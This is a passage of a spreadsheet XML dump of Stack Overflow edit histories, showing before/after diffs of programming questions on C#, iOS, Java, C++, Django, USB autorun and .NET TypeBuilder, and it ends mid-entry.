 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;EDIT:&lt;/span&gt;&lt;/strong&gt; I've now retagged all of the questions marked &lt;code&gt;&lt;span class="diff-delete"&gt;"c#3.5"&lt;/span&gt;&lt;/code&gt; to &lt;a href="/questions/tagged/c%23-3.0" class="post-tag" title="show questions tagged 'c#-3.0'" rel="tag"&gt;c#-3.0&lt;/a&gt; and &lt;code&gt;&lt;span class="diff-delete"&gt;"c#4"&lt;/span&gt;&lt;/code&gt; to &lt;a href="/questions/tagged/c%23-4.0" class="post-tag" title="show questions tagged 'c#-4.0'" rel="tag"&gt;c#-4.0&lt;/a&gt;. If those of us who care about this could try to keep an eye out for new questions with those tags, that would be handy :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are the correct version numbers for &lt;span class="diff-add"&gt;C#&lt;/span&gt;? What came out when? Why can't I find any answers about &lt;span class="diff-add"&gt;C# 3.5&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; [This question is primarily to aid those who are searching for an answer using an incorrect version number, e.g. &lt;span class="diff-add"&gt;"C# 3.5"&lt;/span&gt;. At the time of this writing, there are several questions tagged with "c#3.5". I'm shortly going to correct this, as recommended by the answer to this question about terminology. The hope is that anyone failing to find an answer with the wrong version number will find &lt;em&gt;this&lt;/em&gt; answer and then search again with the right version number.]&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT:&lt;/span&gt; I've now retagged all of the questions marked &lt;span class="diff-add"&gt;"c#3.5"&lt;/span&gt; to &lt;a href="/questions/tagged/c%23-3.0" class="post-tag" title="show questions tagged 'c#-3.0'" rel="tag"&gt;c#-3.0&lt;/a&gt; and &lt;span class="diff-add"&gt;"c#4"&lt;/span&gt; to &lt;a href="/questions/tagged/c%23-4.0" class="post-tag" title="show questions tagged 'c#-4.0'" rel="tag"&gt;c#-4.0&lt;/a&gt;. If those of us who care about this could try to keep an eye out for new questions with those tags, that would be handy :)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dipesh Parmar</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; cell.accessoryType = UITableViewCellAccessoryDisclosureIndicator;&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; in this method&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;- (UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but I can only see it when I select that cell otherwise it's not visible.&lt;span class="diff-delete"&gt; It works&lt;/span&gt; perfectly when background is white.&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I&lt;/span&gt; am sure that I need to set a property, but I don't know which property I need to change to make this thing work.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Thanks&lt;/span&gt; in advance.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Cheers&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;cell.accessoryType = UITableViewCellAccessoryDisclosureIndicator;&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; in this method&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;(UITableViewCell *)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but I can only see it when I select that cell otherwise it's not visible.&lt;span class="diff-add"&gt;and it work&lt;/span&gt; perfectly when background is white.&lt;span class="diff-add"&gt; I&lt;/span&gt; am sure that I need to set a property, but I don't know which property I need to change to make this thing work.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;thanks&lt;/span&gt; in advance.&lt;/p&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;cheers&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Amit Vaghela</t>
  </si>
  <si>
    <t>Chris Hanson</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; FindBugs has found a potential bug in my code. But it is not a bug.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it possible to mark &lt;strong&gt;&lt;span class="diff-delete"&gt;this occurrence&lt;/span&gt;&lt;/strong&gt; as 'not a bug' AND have it removed from the bug list?&lt;/p&gt; _x000D_
 &lt;p&gt; I have documented quite clearly why for each case it is not a bug.&lt;/p&gt; _x000D_
 &lt;p&gt; For example. A class implements the comparable interface. it has the compareTo method. I have however not overridden the equals method.&lt;/p&gt; _x000D_
 &lt;p&gt; FindBugs does not like this as the JavaDocs state that it is recommended that&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;(x.compareTo(y)==0) == (x.equals(y))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Although in my case the above condition is and always will be true.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; FindBugs has found a potential bug in my code. But it is not a bug.&lt;/p&gt; _x000D_
 &lt;p&gt; Is it possible to mark &lt;span class="diff-add"&gt;this occurrence&lt;/span&gt; as 'not a bug' AND have it removed from the bug list?&lt;/p&gt; _x000D_
 &lt;p&gt; I have documented quite clearly why for each case it is not a bug.&lt;/p&gt; _x000D_
 &lt;p&gt; For example. A class implements the comparable interface. it has the compareTo method. I have however not overridden the equals method.&lt;/p&gt; _x000D_
 &lt;p&gt; FindBugs does not like this as the JavaDocs state that it is recommended that&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;(x.compareTo(y)==0) == (x.equals(y))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Although in my case the above condition is and always will be true.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ron Tuffin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;java.net.InetAddress.GetByName(String host)&lt;/code&gt; method can only return &lt;code&gt;A&lt;/code&gt; records so to lookup other record types I need to be able to send DNS queries using the &lt;code&gt;dnsjava&lt;/code&gt; library.&lt;/p&gt; _x000D_
 &lt;p&gt; However&lt;span class="diff-delete"&gt;,&lt;/span&gt; that normally relies on being able to parse &lt;code&gt;/etc/resolv.conf&lt;/code&gt; or similar to find the DNS server addresses and that doesn't work on Android.&lt;/p&gt; _x000D_
 &lt;p&gt; The current DNS settings on Android can apparently only be obtained from within a shell by using the &lt;code&gt;getprop&lt;/code&gt; command.&lt;/p&gt; _x000D_
 &lt;p&gt; Can anyone tell me how to get those settings from Java other than by spawning a shell with &lt;code&gt;Runtime.exec()&lt;/code&gt; and parsing the output from &lt;code&gt;getprop&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;code&gt;java.net.InetAddress.GetByName(String host)&lt;/code&gt; method can only return &lt;code&gt;A&lt;/code&gt; records so to lookup other record types I need to be able to send DNS queries using the &lt;code&gt;dnsjava&lt;/code&gt; library.&lt;/p&gt; _x000D_
 &lt;p&gt; However that normally relies on being able to parse &lt;code&gt;/etc/resolv.conf&lt;/code&gt; or similar to find the DNS server addresses and that doesn't work on Android.&lt;/p&gt; _x000D_
 &lt;p&gt; The current DNS settings on Android can apparently only be obtained from within a shell by using the &lt;code&gt;getprop&lt;/code&gt; command.&lt;/p&gt; _x000D_
 &lt;p&gt; Can anyone tell me how to get those settings from Java other than by spawning a shell with &lt;code&gt;Runtime.exec()&lt;/code&gt; and parsing the output from &lt;code&gt;getprop&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alnitak</t>
  </si>
  <si>
    <t>Uddhav Gautam</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As the title says, I have a Windows app written in C++ from which I need to make calls to remote Thrift services, and I'm a bit lost on the subject, to be honest. &lt;a href="http://wiki.apache.org/thrift/ThriftInstallationWin32" rel="nofollow noreferrer"&gt;http://wiki.apache.org/thrift/ThriftInstallationWin32&lt;/a&gt; states that "The Thrift C++ runtime library does not currently work on Windows". Does that mean I'm out of luck, or is there a workaround?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; As the title says, I have a Windows app written in C++ from which I need to make calls to remote Thrift services, and I'm a bit lost on the subject, to be honest. &lt;a href="http://wiki.apache.org/thrift/ThriftInstallationWin32" rel="nofollow noreferrer"&gt;http://wiki.apache.org/thrift/ThriftInstallationWin32&lt;/a&gt; states that "The Thrift C++ runtime library does not currently work on Windows". Does that mean I'm&lt;span class="diff-add"&gt; shit&lt;/span&gt; out of luck, or is there a workaround?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>korona</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am having dependency troubles. I have two classes: &lt;code&gt;Graphic&lt;/code&gt; and &lt;code&gt;Image&lt;/code&gt;. Each one has its own .cpp and .h files. I am declaring them as the following:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Graphic.h&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
    class Graphic {_x000D_
      ..._x000D_
    };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Image.h&lt;/code&gt;:&lt;br&gt; &lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
#include "Graphic.h"_x000D_
class Image : public Graphic {_x000D_
..._x000D_
};&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; When I try to compile, I get the following error:&lt;/p&gt; _x000D_
 &lt;pre&gt;    Image.h:12: error: expected class-name before â€˜{â€™ token_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am having dependency troubles. I have two classes: &lt;code&gt;Graphic&lt;/code&gt; and &lt;code&gt;Image&lt;/code&gt;. Each one has its own .cpp and .h files. I am declaring them as the following:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Graphic.h&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
    &lt;span class="diff-add"&gt;#include "Image.h"_x000D_
    &lt;/span&gt;class&lt;span class="diff-add"&gt; Image;_x000D_
   &lt;/span&gt; &lt;span class="diff-add"&gt;class &lt;/span&gt;Graphic {_x000D_
      ..._x000D_
    };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;Image.h&lt;/code&gt;:&lt;br&gt; &lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;_x000D_
#include "Graphic.h"_x000D_
class &lt;span class="diff-add"&gt;Graphic;_x000D_
class &lt;/span&gt;Image : public Graphic {_x000D_
..._x000D_
};&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; When I try to compile, I get the following error:&lt;/p&gt; _x000D_
 &lt;pre&gt;    Image.h:12: error: expected class-name before â€˜{â€™ token&lt;span class="diff-add"&gt;_x000D_
&lt;/span&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If I remove the forward declaration of &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Graphic&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; from &lt;/span&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Image.h&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-add"&gt; I get the following error:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-add"&gt;_x000D_
    Image.h:13: error: invalid use of incomplete type â€˜struct Graphicâ€™_x000D_
    Image.h:10: error: forward declaration of â€˜struct Graphicâ€™&lt;/span&gt;_x000D_
&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Steven Oxley</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We've got products built both with GUI and CHUI. Going forward, we're looking at redesigning a lot of our software and mainly taking the route of going all GUI. My question to the group is, do we need to account for keeping a CHUI around? What are the advantages of CHUI over GUI? Many times in the past people have said that CHUI is faster because you don't need a mouse. I argue that GUI can be just as fast with the right keyboard shortcuts, hotkeys and/or touch screens.&lt;/p&gt; _x000D_
 &lt;p&gt; Is CHUI something we should no longer consider if hardware no longer provides a constraint?&lt;/p&gt; _x000D_
 &lt;p&gt; Also to clarify, when I speak about CHUI I mean a &lt;span class="diff-delete"&gt;Character&lt;/span&gt; based User Interface, and I'm also mainly concerned with the effective presentation of data to an end user.&lt;/p&gt; _x000D_
 &lt;p&gt; There have been some fantastic responses that have highlighted the importance of having a command line based interface for automation and scripting based tasks which I will certainly take to heart when we begin the design!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We've got products built both with GUI and CHUI. Going forward, we're looking at redesigning a lot of our software and mainly taking the route of going all GUI. My question to the group is, do we need to account for keeping a CHUI around? What are the advantages of CHUI over GUI? Many times in the past people have said that CHUI is faster because you don't need a mouse. I argue that GUI can be just as fast with the right keyboard shortcuts, hotkeys and/or touch screens.&lt;/p&gt; _x000D_
 &lt;p&gt; Is CHUI something we should no longer consider if hardware no longer provides a constraint?&lt;/p&gt; _x000D_
 &lt;p&gt; Also to clarify, when I speak about CHUI I mean a &lt;span class="diff-add"&gt;CHaracter&lt;/span&gt; based User Interface, and I'm also mainly concerned with the effective presentation of data to an end user.&lt;/p&gt; _x000D_
 &lt;p&gt; There have been some fantastic responses that have highlighted the importance of having a command line based interface for automation and scripting based tasks which I will certainly take to heart when we begin the design!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>ine</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why does this lambda expression not compile?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Action a = () =&amp;gt; throw new InvalidOperationException();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Conjecture is fine, but I would really appreciate references to the C# language specification or other documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; And yes, I know that the following is valid and will compile:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Action a = () =&amp;gt; { throw new InvalidOperationException(); };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The context where I would use something like this is described on &lt;a href="http://jacobcarpenter.wordpress.com/2008/10/06/c-compiler-eccentricity-of-the-day-throwing-lambda/" rel="nofollow noreferrer"&gt;this blog post&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Update:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt; It definitely appears related to &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/254273/c-action-lambda-limitation#254319"&gt;&lt;span class="diff-delete"&gt;leppe's&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; and &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/254273/c-action-lambda-limitation#254333"&gt;&lt;span class="diff-delete"&gt;jon's&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; answers about &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;throw&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; being a statement. But does that mean &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;num = 1&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;not&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; a statement?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; As in&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;int num;_x000D_
Action a = () =&amp;gt; num = 1;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Why does this lambda expression not compile?&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Action a = () =&amp;gt; throw new InvalidOperationException();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Conjecture is fine, but I would really appreciate references to the C# language specification or other documentation.&lt;/p&gt; _x000D_
 &lt;p&gt; And yes, I know that the following is valid and will compile:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Action a = () =&amp;gt; { throw new InvalidOperationException(); };_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The context where I would use something like this is described on &lt;a href="http://jacobcarpenter.wordpress.com/2008/10/06/c-compiler-eccentricity-of-the-day-throwing-lambda/" rel="nofollow noreferrer"&gt;this blog post&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jacob Carpenter</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I embed a tag within ( not nested ) another tag in a django &lt;span class="diff-delete"&gt;template&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; Django 1.0 , Python 2.5.2&lt;/p&gt; _x000D_
 &lt;p&gt; In views.py&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def home_page_view(request):_x000D_
    NUP={"HOMEPAGE": "named-url-pattern-string-for-my-home-page-view"}    _x000D_
    variables = RequestContext(request, {'NUP':NUP})_x000D_
    return render_to_response('home_page.html', variables)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In home_page.html, the following&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NUP.HOMEPAGE = {{ NUP.HOMEPAGE }}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; is displayed as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NUP.HOMEPAGE = named-url-pattern-string-for-my-home-page-view_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and the following url named pattern works ( as expected ),&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = {% url named-url-pattern-string-for-my-home-page-view %}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and is displayed as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = /myhomepage/_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but when &lt;code&gt;{{ NUP.HOMEPAGE }}&lt;/code&gt; is embedded within a &lt;code&gt;{% url ... %}&lt;/code&gt; as follows&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = {% url {{ NUP.HOMEPAGE }} %}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; this results in a template syntax error&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;TemplateSyntaxError at /myhomepage/_x000D_
Could not parse the remainder: '}}' from '}}'_x000D_
Request Method: GET_x000D_
Request URL:    http://localhost:8000/myhomepage/_x000D_
Exception Type: TemplateSyntaxError_x000D_
Exception Value:    _x000D_
Could not parse the remainder: '}}' from '}}'_x000D_
Exception Location: C:\Python25\Lib\site-packages\django\template\__init__.py in __init__, line 529_x000D_
Python Executable:  C:\Python25\python.exe_x000D_
Python Version: 2.5.2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I was expecting &lt;code&gt;{% url {{ NUP.HOMEPAGE }} %}&lt;/code&gt; to resolve to &lt;code&gt;{% url named-url-pattern-string-for-my-home-page-view %}&lt;/code&gt; at runtime and be displayed as &lt;code&gt;/myhomepage/&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Are embedded tags not supported in django?&lt;/p&gt; _x000D_
 &lt;p&gt; is it possible to write a custom template tag with embedded tags support to make this work?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;{% url {{ NUP.HOMEPAGE }} %}&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I embed a tag within ( not nested ) another tag in a django &lt;span class="diff-add"&gt;tempalte&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; Django 1.0 , Python 2.5.2&lt;/p&gt; _x000D_
 &lt;p&gt; In views.py&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;def home_page_view(request):_x000D_
    NUP={"HOMEPAGE": "named-url-pattern-string-for-my-home-page-view"}    _x000D_
    variables = RequestContext(request, {'NUP':NUP})_x000D_
    return render_to_response('home_page.html', variables)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; In home_page.html, the following&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NUP.HOMEPAGE = {{ NUP.HOMEPAGE }}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; is displayed as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;NUP.HOMEPAGE = named-url-pattern-string-for-my-home-page-view_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and the following url named pattern works ( as expected ),&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = {% url named-url-pattern-string-for-my-home-page-view %}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; and is displayed as&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = /myhomepage/_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; but when &lt;code&gt;{{ NUP.HOMEPAGE }}&lt;/code&gt; is embedded within a &lt;code&gt;{% url ... %}&lt;/code&gt; as follows&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;url template tag for NUP.HOMEPAGE = {% url {{ NUP.HOMEPAGE }} %}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; this results in a template syntax error&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;TemplateSyntaxError at /myhomepage/_x000D_
Could not parse the remainder: '}}' from '}}'_x000D_
Request Method: GET_x000D_
Request URL:    http://localhost:8000/myhomepage/_x000D_
Exception Type: TemplateSyntaxError_x000D_
Exception Value:    _x000D_
Could not parse the remainder: '}}' from '}}'_x000D_
Exception Location: C:\Python25\Lib\site-packages\django\template\__init__.py in __init__, line 529_x000D_
Python Executable:  C:\Python25\python.exe_x000D_
Python Version: 2.5.2_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; I was expecting &lt;code&gt;{% url {{ NUP.HOMEPAGE }} %}&lt;/code&gt; to resolve to &lt;code&gt;{% url named-url-pattern-string-for-my-home-page-view %}&lt;/code&gt; at runtime and be displayed as &lt;code&gt;/myhomepage/&lt;/code&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Are embedded tags not supported in django?&lt;/p&gt; _x000D_
 &lt;p&gt; is it possible to write a custom template tag with embedded tags support to make this work?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;code&gt;{% url {{ NUP.HOMEPAGE }} %}&lt;/code&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>X10</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; is it possible to automatically launch an app from USB flash drive (bypassing windows prompt asking user what he wants to do)? on windows XP or vista.&lt;/p&gt; _x000D_
 &lt;p&gt; I looked into &lt;strong&gt;autorun.inf&lt;/strong&gt; and &lt;strong&gt;open&lt;/strong&gt; entry seems to work only for CD drives&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; is it possible to automatically launch an app from USB flash drive (bypassing windows prompt asking user what he wants to do)? on windows XP or vista.&lt;/p&gt; _x000D_
 &lt;p&gt; I looked into &lt;strong&gt;autorun.inf&lt;/strong&gt; and &lt;strong&gt;open&lt;/strong&gt; entry seems to work only for CD drives&lt;span class="diff-add"&gt; for Windows XP SP2+ and Vista. Is it possible to launch program automatically on all windows versions?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I don't care if autorun is disabled by user in Windows settings.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sumrak</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does a tool exist for dynamically altering running javascript in a browser? For example, to changes the values of javascript variables during runtime.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Please explain how you would use the tool to alter the running script, particularly non-global code.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does a tool exist for dynamically altering running javascript in a browser? For example, to changes the values of javascript variables during runtime.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gary Willoughby</t>
  </si>
  <si>
    <t>eyelidlessness</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a typebuilder that is generating two identical .ctors one that is has no method body and the other that has all the init code.&lt;/p&gt; _x000D_
 &lt;p&gt; I am defining a field from another type and a property to access the type and therefore need to init it in the .ctor&lt;/p&gt; _x000D_
 &lt;p&gt; Where should I start looking&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a typebuilder that is generating two identical .ctors one that is has no method body and the other that has all the init code.&lt;/p&gt; _x000D_
 &lt;p&gt; I am defining a field from another type and a property to access the type and therefore need to init it in the .ctor&lt;/p&gt; _x000D_
 &lt;p&gt; Where should I start looking&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Code as follows&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Public Sub ctor(ByVal type As TypeBuilder, ByVal FieldRefs As Dictionary(Of Type, FieldBuilder))_x000D_
    ' Method attributes_x000D_
    Dim methodAttributes As System.Reflection.MethodAttributes = MethodAttributes.[Public]_x000D_
_x000D_
    Dim method As MethodBuilder = type.DefineMethod(".ctor", methodAttributes)_x000D_
    ' Preparing Reflection instances_x000D_
_x000D_
    Dim ctor1 As ConstructorInfo = GetType(Object).GetConstructor(BindingFlags.Instance Or BindingFlags.[Public] Or BindingFlags.NonPublic, Nothing, Nothing, Nothing)_x000D_
_x000D_
    ' Setting return type_x000D_
    method.SetReturnType(GetType(Void))_x000D_
    ' Adding parameters_x000D_
    Dim gen As ILGenerator = method.GetILGenerator()_x000D_
    ' Writing body_x000D_
    gen.Emit(OpCodes.Ldarg_0)_x000D_
    gen.Emit(OpCodes.[Call], ctor1)_x000D_
    _x000D_
    'new up fields_x000D_
    For Each item In FieldRefs_x000D_
        AddCtor(type, gen, item.Value, item.Key)_x000D_
    Next_x000D_
_x000D_
    gen.Emit(OpCodes.Ret)_x000D_
_x000D_
    ' finished_x000D_
End Sub_x000D_
_x000D_
_x000D_
